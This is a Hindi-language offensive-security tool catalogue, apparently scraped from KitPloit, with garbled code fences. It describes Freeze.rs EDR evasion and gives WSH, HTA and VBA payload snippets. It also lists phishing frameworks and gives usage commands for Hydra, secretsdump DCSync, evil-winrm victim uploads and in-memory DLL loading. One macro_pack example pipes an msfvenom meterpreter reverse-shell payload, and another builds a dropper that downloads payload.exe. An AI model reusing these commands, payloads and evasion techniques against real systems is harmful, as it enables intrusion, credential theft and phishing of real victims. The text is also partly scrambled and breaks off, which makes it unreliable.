Freeze.rs एक .exe या .dll फ़ाइल जनरेट कर सकता है। यह निर्दिष्ट करने के लिए, सुनिश्चित करें कि -O कमांड-लाइन विकल्प बाइनरी के लिए .exe या DLL के लिए .dll के साथ समाप्त होता है। अन्य फ़ाइल प्रकार वर्तमान में समर्थित नहीं हैं। DLL फ़ाइलों के मामले में, Freeze.rs अतिरिक्त निर्यात कार्यक्षमता भी जोड़ सकता है। ऐसा करने के लिए विशिष्ट निर्यात फ़ंक्शन नाम के साथ -export का उपयोग करें।

**एन्क्रिप्शन**
शेलकोड को एन्क्रिप्ट करना एक महत्वपूर्ण तकनीक है जिसका उपयोग इसे EDRs और अन्य सुरक्षा उत्पादों द्वारा पहचाने और विश्लेषण किए जाने से बचाने के लिए किया जाता है। Freeze.rs शेलकोड को एन्क्रिप्ट करने के लिए कई विधियों के साथ आता है, इनमें AES, ELZMA, और RC4 शामिल हैं।

**AES**
AES (एडवांस्ड एन्क्रिप्शन स्टैंडर्ड) एक सममित एन्क्रिप्शन एल्गोरिद्म है जिसका व्यापक रूप से डेटा को एन्क्रिप्ट करने के लिए उपयोग किया जाता है। Freeze.rs शेलकोड को एन्क्रिप्ट करने के लिए AES-256 बिट आकार का उपयोग करता है। शेलकोड को एन्क्रिप्ट करने के लिए AES का उपयोग करने का लाभ यह है कि यह मजबूत एन्क्रिप्शन प्रदान करता है और क्रिप्टोग्राफिक लाइब्रेरीज़ द्वारा व्यापक रूप से समर्थित है। हालाँकि, एक निश्चित ब्लॉक आकार का उपयोग इसे कुछ हमलों, जैसे पैडिंग ऑरेकल अटैक, के प्रति संवेदनशील बना सकता है।

**ELZMA**
ELZMA एक संपीड़न और एन्क्रिप्शन एल्गोरिद्म है जिसका उपयोग अक्सर मैलवेयर में कोड को अस्पष्ट करने के लिए किया जाता है। ELZMA का उपयोग करके शेलकोड को एन्क्रिप्ट करने के लिए, शेलकोड को पहले ELZMA एल्गोरिद्म का उपयोग करके संपीड़ित किया जाता है। संपीड़ित डेटा को फिर एक रैंडम कुंजी का उपयोग करके एन्क्रिप्ट किया जाता है। एन्क्रिप्टेड डेटा और कुंजी को फिर एक्सप्लॉइट कोड में एम्बेड किया जाता है। ELZMA का उपयोग करके शेलकोड को एन्क्रिप्ट करने का लाभ यह है कि यह एक ही एल्गोरिद्म में संपीड़न और एन्क्रिप्शन दोनों प्रदान करता है। इससे एक्सप्लॉइट कोड के आकार को कम करने और इसे डिटेक्ट करना अधिक कठिन बनाने में मदद मिल सकती है।

**RC4**
RC4 एक सममित एन्क्रिप्शन एल्गोरिद्म है जिसका उपयोग अक्सर मैलवेयर में शेलकोड को एन्क्रिप्ट करने के लिए किया जाता है। यह एक स्ट्रीम सिफर है जो वेरिएबल-लेंथ कुंजियों का उपयोग कर सकता है और अपनी सरलता और गति के लिए जाना जाता है।

**कंसोल**
Freeze.rs पहले प्रक्रिया बनाने और फिर इसे बैकग्राउंड में ले जाने की एक तकनीक का उपयोग करता है। यह दो काम करता है - पहला, यह प्रक्रिया को छिपाए रखने में मदद करता है, और दूसरा, किसी भी EDR उत्पाद द्वारा पकड़े जाने से बचाता है। प्रक्रिया को तुरंत बैकग्राउंड में स्पॉन करना बहुत संदिग्ध और दुर्भावना का संकेत हो सकता है। Freeze.rs ऐसा प्रक्रिया बनने और EDR के हुक लोड होने के बाद 'GetConsoleWindow' और 'ShowWindow' विंडोज फ़ंक्शन को कॉल करके करता है, और फिर विंडो की विशेषताओं को हिडन में बदल देता है।

यदि -console कमांड-लाइन विकल्प चुना जाता है, तो Freeze.rs प्रक्रिया को बैकग्राउंड में नहीं छिपाएगा। इसके बजाय, Freeze.rs कई डीबग संदेश जोड़ेगा जो दर्शाते हैं कि लोडर क्या कर रहा है।

---

### [🔙](#tool-list)WSH

**पेलोड बनाना:**```vbs
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

निष्पादित करें:```bash wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted

root@kitploit:~
### [🔙](#tool-list)HTA

**पेलोड बनाना:**```html
<html>
  <body>
    <script>
      var c = "cmd.exe";
      new ActiveXObject("WScript.Shell").Run(c);
    </script>
  </body>
</html>

निष्पादित करें: फ़ाइल चलाएं

🔙VBA

पेलोड बनाना:```python Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub

root@kitploit:~
**निष्पादित करें:** मैक्रो सक्षम दस्तावेज़ में फ़ंक्शन को Auto_Open() पर सेट करें

# प्रारंभिक पहुंच

### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny)

Bash Bunny एक भौतिक USB आक्रमण उपकरण और बहु-कार्य पेलोड वितरण प्रणाली है। इसे कंप्यूटर के USB पोर्ट में प्लग करने के लिए डिज़ाइन किया गया है और इसे विभिन्न कार्यों को करने के लिए प्रोग्राम किया जा सकता है, जिसमें डेटा में हेरफेर और बहिर्गमन, मैलवेयर स्थापित करना और सुरक्षा उपायों को बायपास करना शामिल है।

[hackinglab: Bash Bunny – गाइड](https://hackinglab.cz/en/blog/bash-bunny-guide/)

[Hak5 दस्तावेज़ीकरण](https://docs.hak5.org/bash-bunny/)

[अच्छा पेलोड रिपॉजिटरी](https://github.com/hak5/bashbunny-payloads)

[उत्पाद पृष्ठ](https://hak5.org/products/bash-bunny)

![image](https://assets.kitploit.com/production/public/readmes/495/a9fc36ccc8742ad176a0455fea6a50a355f6a873f99ab472c3b81989c3093b66.png)

### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish)

evilginx2 + gophish. (GoPhish) Gophish एक शक्तिशाली, ओपन-सोर्स फ़िशिंग फ्रेमवर्क है जो आपके संगठन की फ़िशिंग के प्रति संवेदनशीलता का परीक्षण करना आसान बनाता है। (evilginx2) स्टैंडअलोन मैन-इन-द-मिडिल अटैक फ्रेमवर्क जिसका उपयोग लॉगिन क्रेडेंशियल्स के साथ-साथ सत्र कुकीज़ को फ़िश करने के लिए किया जाता है, जिससे 2-कारक प्रमाणीकरण को बायपास किया जा सकता है।

**स्थापित करें:**```bash
git clone https://github.com/fin3ss3g0d/evilgophish

उपयोग:``` Usage: ./setup <subdomain(s)>

  • root domain - the root domain to be used for the campaign
  • subdomains - a space separated list of evilginx2 subdomains, can be one if only one
  • root domain bool - true or false to proxy root domain to evilginx2
  • redirect url - URL to redirect unauthorized Apache requests
  • feed bool - true or false if you plan to use the live feed
  • rid replacement - replace the gophish default "rid" in phishing URLs with this value
  • blacklist bool - true or false to use Apache blacklist Example: ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false
root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/d21f6533174ab65dbb6ec6fc044fdad87fe0654f01a6be5f17a862588bf9a0ec.png)

### [🔙](#tool-list)[Social Engineer Toolkit (SET)](https://github.com/IO1337/social-engineering-toolkit)

यह फ्रेमवर्क प्रारंभिक पहुंच के लिए अभियान बनाने के लिए बहुत अच्छा है, 'SET में कई कस्टम अटैक वैक्टर हैं जो आपको जल्दी से एक विश्वसनीय हमला करने की अनुमति देते हैं'।

**स्थापित करें:**```bash
git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install

उपयोग:```bash python3 setoolkit

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/962be1664db4237288b6ac2bf77cb98be8c69715d67efdc36178eb16e8178e1c.png)

### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra)

लॉगिन ब्रूट फ़ोर्स हमलों के लिए अच्छा उपकरण। SSH, FTP, TELNET, HTTP आदि सहित कई सेवाओं पर ब्रूट फ़ोर्स कर सकता है।

**स्थापना:**```bash
sudo apt install hydra

उपयोग:```bash hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/c1f8846e81658f9a3679da0ff42c1efc12d30861a6a706c61449b956e14f8417.png)

### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish)

SquarePhish एक उन्नत फ़िशिंग उपकरण है जो OAuth Device Code प्रमाणीकरण प्रवाह और QR कोड को संयोजित करने वाली तकनीक का उपयोग करता है (फ़िशिंग हमलों के लिए OAuth Device Code प्रवाह के बारे में अधिक जानने के लिए [PhishInSuits](https://github.com/secureworks/PhishInSuits) देखें)।

हमले के चरण:

- पीड़ित को दुर्भावनापूर्ण QR कोड भेजें
- पीड़ित मोबाइल डिवाइस से QR कोड स्कैन करता है
- पीड़ित हमलावर द्वारा नियंत्रित सर्वर पर निर्देशित होता है (OAuth Device Code प्रमाणीकरण प्रवाह प्रक्रिया शुरू होती है)
- पीड़ित को MFA कोड ईमेल किया जाता है (OAuth Device Code प्रवाह 15 मिनट का टाइमर शुरू होता है)
- हमलावर प्रमाणीकरण के लिए पोल करता है
- पीड़ित वैध Microsoft वेबसाइट पर कोड दर्ज करता है
- हमलावर प्रमाणीकरण टोकन सहेजता है

**स्थापना:**```bash
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt

नोट: किसी भी मॉड्यूल का उपयोग करने से पहले, settings.config फ़ाइल में Required के साथ चिह्नित आवश्यक जानकारी अपडेट करें।

उपयोग (ईमेल मॉड्यूल):``` usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments: -h, --help show this help message and exit

-c CONFIG, --config CONFIG squarephish config file [Default: settings.config]

--debug enable server debugging

-e EMAIL, --email EMAIL victim email address to send initial QR code email to

root@kitploit:~
**उपयोग (सर्वर मॉड्यूल):**```
usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

image

🔙King Phisher

King Phisher एक उपकरण है जो हमलावरों को पीड़ितों को संवेदनशील जानकारी प्राप्त करने के लिए फिशिंग ईमेल बनाने और भेजने की अनुमति देता है।

इसमें अनुकूलन योग्य टेम्पलेट्स, अभियान प्रबंधन, और ईमेल भेजने की क्षमताएं जैसी सुविधाएं शामिल हैं, जो इसे फिशिंग हमलों को अंजाम देने के लिए एक शक्तिशाली और उपयोग में आसान उपकरण बनाती हैं। King Phisher के साथ, हमलावर लक्षित और विश्वासपात्र फिशिंग ईमेल के साथ व्यक्तियों या संगठनों को लक्षित कर सकते हैं, जिससे उनके हमलों में सफलता की संभावना बढ़ जाती है।

इंस्टॉल (लिनक्स - क्लाइंट और सर्वर):```bash wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh &&
sudo bash ./install.sh

root@kitploit:~
**उपयोग:**

King Phisher स्थापित होने के बाद कृपया SSH, डेटाबेस कॉन्फ़िग, SMTP सर्वर आदि सेटअप करने के लिए [wiki पेज](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started) का पालन करें।

![image](https://assets.kitploit.com/production/public/readmes/495/ab8900f24709e60727b9ae8d91dc00da72eb17a099da35552cfd09ad542e20b5.png)

# निष्पादन

### [🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder)

Responder एक उपकरण है जो नेटवर्क पर LLMNR और NBT-NS प्रोटोकॉल को पॉइज़निंग करने के लिए है, ताकि क्रेडेंशियल कैप्चर और मनमाना कोड निष्पादन संभव हो सके।

LLMNR (लिंक-लोकल मल्टीकास्ट नेम रिज़ॉल्यूशन) और NBT-NS (नेटबीआईओएस नेम सर्विस) प्रोटोकॉल विंडोज सिस्टम द्वारा स्थानीय नेटवर्क पर होस्टनामों को आईपी पतों में हल करने के लिए उपयोग किए जाते हैं। यदि इन प्रोटोकॉल का उपयोग करके होस्टनाम हल नहीं किया जा सकता है, तो सिस्टम स्थानीय नेटवर्क पर होस्टनाम के लिए एक प्रसारण अनुरोध भेजेगा।

Responder इन प्रसारणों को सुनता है और एक नकली आईपी पते के साथ प्रतिक्रिया देता है, अनुरोध करने वाले सिस्टम को धोखा देकर अपने क्रेडेंशियल हमलावर को भेजने के लिए प्रेरित करता है।

**स्थापना:**```bash
git clone https://github.com/SpiderLabs/Responder#usage
cd Responder

उपयोग:```bash

Running the tool

./Responder.py [options]

Typical usage

./Responder.py -I eth0 -wrf

root@kitploit:~
पूर्ण उपयोग जानकारी [यहाँ](https://github.com/SpiderLabs/Responder#usage) पाई जा सकती है।

![image](https://assets.kitploit.com/production/public/readmes/495/1557d2d9375fcf140ae01d21311d11ce93eabb676e40f6eb39ec25e0f4959c12.png)

_चित्र https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/ से लिया गया है_

### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)

यह उपयोगिता Impacket लाइब्रेरी का भाग है जिसका उपयोग विंडोज सिस्टम से पासवर्ड हैश और अन्य गुप्त जानकारी निकालने के लिए किया जा सकता है।

यह सिस्टम पर Security Account Manager (SAM) डेटाबेस के साथ इंटरैक्ट करके हैश किए गए पासवर्ड और अन्य जानकारी निकालता है, जैसे:

- स्थानीय खातों के लिए पासवर्ड हैश
- Kerberos टिकट और कुंजियाँ
- LSA Secrets

**स्थापना:**```bash
python3 -m pip install impacket

उपयोग:```bash

Extract NTLM hashes with local files

secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

DCSync attack and dump the NTLM hashes of all domain users.

secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected]

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/e9e242c346297388c540da63c467f568ea0b33980e52d48bd8154d745147f192.png)

_से ली गई छवि https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy_

### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm)

Evil-WinRM एक उपकरण है जो विंडोज रिमोट मैनेजमेंट (WinRM: _एक सेवा जो प्रशासकों को विंडोज मशीन पर दूरस्थ रूप से कमांड निष्पादित करने की अनुमति देती है_) के लिए एक कमांड लाइन इंटरफ़ेस प्रदान करता है।

Evil-WinRM एक आक्रमणकारी को WinRM का उपयोग करके विंडोज मशीन से दूरस्थ रूप से कनेक्ट करने और मनमाने आदेशों को निष्पादित करने की अनुमति देता है।

कुछ विशेषताओं में शामिल हैं:

- मेमोरी में पॉवरशेल स्क्रिप्ट लोड करना
- कुछ AV को बायपास करते हुए मेमोरी में dll फ़ाइलें लोड करना
- x64 पेलोड लोड करना
- पास-द-हैश समर्थन
- स्थानीय और दूरस्थ फ़ाइलों को अपलोड और डाउनलोड करना

**स्थापना: (Git)**```bash
sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm

इंस्टॉल करें: (Ruby gem)```bash gem install evil-winrm

root@kitploit:~
वैकल्पिक इंस्टॉलेशन निर्देश [यहाँ](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods) पाए जा सकते हैं।

**उपयोग:**```bash
# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm  -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

# Upload local files to victim
upload local_filename
upload local_filename destination_filename

# Download remote files to local machine
download remote_filename
download remote_filename destination_filename

# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe

# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll

पूर्ण उपयोग दस्तावेज़ीकरण यहाँ पाया जा सकता है here.

image

चित्र का उपयोग किया गया है https://korbinian-spielvogel.de/posts/heist-writeup/ से

🔙Donut

VBScript, JScript, EXE, DLL फ़ाइलों और dotNET असेंबलियों के मेमोरी में निष्पादन के लिए एक उपकरण। इसका उपयोग लक्ष्य प्रणालियों पर डिस्क पर फ़ाइलें ड्रॉप करने की आवश्यकता के बिना कस्टम पेलोड लोड और चलाने के लिए किया जा सकता है।

स्थापना: (Windows)```bash git clone http://github.com/thewover/donut.git

root@kitploit:~
लोडर टेम्पलेट, डायनेमिक लाइब्रेरी donut.dll, स्टैटिक लाइब्रेरी donut.lib और जनरेटर donut.exe उत्पन्न करने के लिए। एक x64 Microsoft Visual Studio Developer Command Prompt प्रारंभ करें, उस निर्देशिका में बदलें जहां आपने Donut रिपॉजिटरी को क्लोन किया है और निम्नलिखित दर्ज करें:```bash
nmake -f Makefile.msvc

ऐसा ही करने के लिए, Windows या Linux पर MinGW-64 का उपयोग करते हुए, उस निर्देशिका में जाएँ जहाँ आपने Donut रिपॉजिटरी को क्लोन किया है और निम्नलिखित दर्ज करें:```bash make -f Makefile.mingw

root@kitploit:~
**स्थापित करें: (Linux)**```bash
pip3 install donut-shellcode

उपयोग:```bash

Creating shellcode from an XSL file that pops up a calculator.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\calc.xsl")

Creating shellcode from an unmanaged DLL. Invokes DLLMain.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")

root@kitploit:~
पूर्ण उपयोग जानकारी के लिए, donut का [GitHub Page](https://github.com/TheWover/donut/#4-usage) देखें।

अधिक जानकारी के लिए The Wover का [हालिया ब्लॉग पोस्ट](https://thewover.github.io/Bear-Claw/) देखें।

![image](https://assets.kitploit.com/production/public/readmes/495/f1dba24c73e1bc864c83173904c6592faee2f8aa854da293767b90d69449d5c4.png)

### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack)

एक उपकरण जो रेड टीमिंग के लिए Office दस्तावेज़ों, VB स्क्रिप्ट्स, शॉर्टकट और अन्य प्रारूपों के अस्पष्टीकरण और निर्माण को स्वचालित करता है।

**स्थापना: (बाइनरी)**

1. नवीनतम बाइनरी [https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/) से प्राप्त करें।
2. वास्तविक Microsoft Office स्थापित पीसी पर बाइनरी डाउनलोड करें।
3. कंसोल खोलें, बाइनरी निर्देशिका पर CD करें और बाइनरी को कॉल करें।

**स्थापना: (Git)**```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt

उपयोग:```bash

Help Page

python3 macro_pack.py --help

List all supported file formats

macro_pack.exe --listformats

Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba

Obfuscate Empire stager VBA file and generate a MS Word document:

macro_pack.exe -f empire.vba -o -G myDoc.docm

Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)

echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"

Execute calc.exe via Dynamic Data Exchange (DDE) attack

echo calc.exe | macro_pack.exe --dde -G calc.xslx

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/05a46a14fba117c71b6b79cec0cccbc403531a302add46b9e55035e7d9d634ef.png)

### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)

PowerShell स्क्रिप्ट और मॉड्यूल का एक संग्रह जिसका उपयोग विभिन्न रेड टीमिंग उद्देश्यों को प्राप्त करने के लिए किया जा सकता है।

PowerSploit की कुछ विशेषताएं:

- मेमोरी से पासवर्ड हैश डंप करें और स्पष्ट-पाठ पासवर्ड निकालें
- विशेषाधिकार बढ़ाएं और सुरक्षा नियंत्रणों को बायपास करें
- मनमाना PowerShell कोड निष्पादित करें और निष्पादन प्रतिबंधों को बायपास करें
- नेटवर्क टोही और खोज करें
- पेलोड उत्पन्न करें और एक्सप्लॉइट निष्पादित करें

**इंस्टॉल:** _1. PowerShell मॉड्यूल फ़ोल्डर में सहेजें_

पहले आपको [PowerSploit फ़ोल्डर](https://github.com/PowerShellMafia/PowerSploit) डाउनलोड करना होगा और इसे अपने PowerShell मॉड्यूल फ़ोल्डर में सहेजना होगा।

आपके PowerShell मॉड्यूल फ़ोल्डर का पथ निम्न कमांड से पाया जा सकता है:```
$Env:PSModulePath

Install: 2. PowerSploit को PowerShell मॉड्यूल के रूप में स्थापित करें

फिर आपको PowerSploit मॉड्यूल स्थापित करना होगा (डाउनलोड किए गए फ़ोल्डर का नाम उपयोग करें)।

नोट: आपकी PowerShell निष्पादन नीति आपको ब्लॉक कर सकती है, इसे ठीक करने के लिए निम्नलिखित कमांड चलाएँ।

root@kitploit:~
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force

powershell.exe -ep bypass

root@kitploit:~
अब आप PowerSploit मॉड्यूल स्थापित कर सकते हैं।```
Import-Module PowerSploit

उपयोग:``` Get-Command -Module PowerSploit

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/be1d37fac661a710be1a2268f5f0090e13b496c05f8d22b56d47e166072e5fff.png)

### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus)

एक उपकरण जिसका उपयोग Microsoft Active Directory (AD) वातावरण से संबंधित विभिन्न क्रियाएं करने के लिए किया जा सकता है, जैसे पासवर्ड हैश डंप करना, उपयोगकर्ता बनाना/हटाना, और उपयोगकर्ता गुणों को संशोधित करना।

Rubeus की कुछ विशेषताएं:

- केरबेरोस्टिंग
- गोल्डन टिकट आक्रमण
- सिल्वर टिकट आक्रमण

**स्थापना: (डाउनलोड)**

आप अनाधिकृत पूर्व-संकलित Rubeus बाइनरी [यहाँ](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe) स्थापित कर सकते हैं।

**स्थापना: (संकलन)**

Rubeus [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/) के साथ संगत है। rubeus [प्रोजेक्ट .sln](https://github.com/GhostPack/Rubeus) खोलें, "Release" चुनें, और बनाएँ।

**उपयोग:**```
Rubeus.exe -h

image

🔙SharpUp

पीड़ित एंडपॉइंट की उच्च अखंडता प्रक्रियाओं, समूहों, हाइजैक करने योग्य पथों आदि से संबंधित कमजोरियों की जाँच के लिए एक अच्छा उपकरण।

स्थापित करें: (डाउनलोड)

आप अनाधिकृत पूर्व-संकलित SharpUp बाइनरी को यहाँ स्थापित कर सकते हैं।

स्थापित करें: (संकलन)

SharpUp Visual Studio 2015 Community Edition के साथ संगत है। SharpUp project .sln खोलें, "Release" चुनें, और build करें।

उपयोग:```bash SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership.

SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable.

SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/881494f39c898e7951e05d177aeaef111636ae85c7a4c9a607f337e3318f7d77.png)

### [🔙](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon)

MS-SQL (Microsoft SQL Server) एक रिलेशनल डेटाबेस प्रबंधन प्रणाली है जिसे Microsoft द्वारा विकसित और विपणन किया गया है।

यह C# MS-SQL टूलकिट आक्रामक टोही और पोस्ट-एक्सप्लॉइटेशन के लिए डिज़ाइन किया गया है। प्रत्येक तकनीक के विस्तृत उपयोग जानकारी के लिए, [wiki](https://github.com/skahwah/SQLRecon/wiki) देखें।

**स्थापित करें: (बाइनरी)**

आप नवीनतम बाइनरी रिलीज़ [यहाँ](https://github.com/skahwah/SQLRecon/releases) से डाउनलोड कर सकते हैं।

**उपयोग:**```bash
# Authenticating using Windows credentials
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# Authenticating using Local credentials

Read more

टूल डाउनलोड करें